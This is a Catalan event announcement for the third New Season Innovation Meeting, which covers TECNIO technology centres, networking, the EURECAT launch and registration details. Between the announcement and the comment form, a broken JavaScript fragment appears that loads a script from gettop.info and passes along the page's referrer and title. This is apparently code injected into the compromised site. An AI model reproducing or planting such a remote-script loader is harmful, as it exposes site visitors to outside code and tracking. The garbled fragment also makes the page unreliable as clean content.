Comunicació

3a edició

ISP, joves empresaris i directius industrials i ACCIÓ us convidem a participar en la tercera jornada de NEW SEASON INNOVATION MEETING

ISP, joves empresaris i directius industrials i ACCIÓ  us convidem  a participar en la tercera  jornada de NEW SEASON INNOVATION MEETING   La tercera edició d’aquest esdeveniment se centrarà en l’àmbit del les tecnologies per a una indústria més competitiva i les oportunitats del Big data.   10 centres TECNIO (centres tecnològics i grups de recerca avalats per la Generalitat de Catalunya) exposaran 10 solucions  per fer més competitiva la teva empresa i a continuació es donarà pas a reunions de 10 minuts cara a cara entre les empreses assistents que ho hagin sol·licitat i els representants del centres TECNIO. En paral·lel podràs gaudir d’un espai de networkingcompartint una copa de cava.   Durant la jornada es presentarà  EURECAT, el nou gran centre tecnològic  promogut  per la Generalitat de Catalunya. ASCAMM, Barcelona Digital, CETEMMSA, CTM, Barcelona Media i Leitat s’uneixen per formar un nou centre integrat  guanyant massa crítica, eficiència i proximitat amb l’empresa catalana.   Objectiu de l’acte:  L’ISP, joves empresaris i directius industrials i ACCIÓ ofereixen: Donar a conèixer a les petites i mitjanes empreses industrials  les tecnologies disponibles que les fan més competitives. Un espai de networking per propiciar la transferència tecnológica entre la indústria i els diferents sectors de creativitat innovadora.   T’interessa si ets…   Una petita o mitjana empresa industrial.   PROGRAMA I INSCRIPCIONS   Inscripció: FORMULARI D’INSCRIPCIÓ (Inscripcions:  Fins al 22 de març)   Més informació: isp@isp.cat // 93 7450944 (Elena Díaz)

} else {

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) {

Deixa un comentari

L'adreça electrònica no es publicarà Els camps necessaris estan marcats amb *

Podeu fer servir aquestes etiquetes i atributs HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>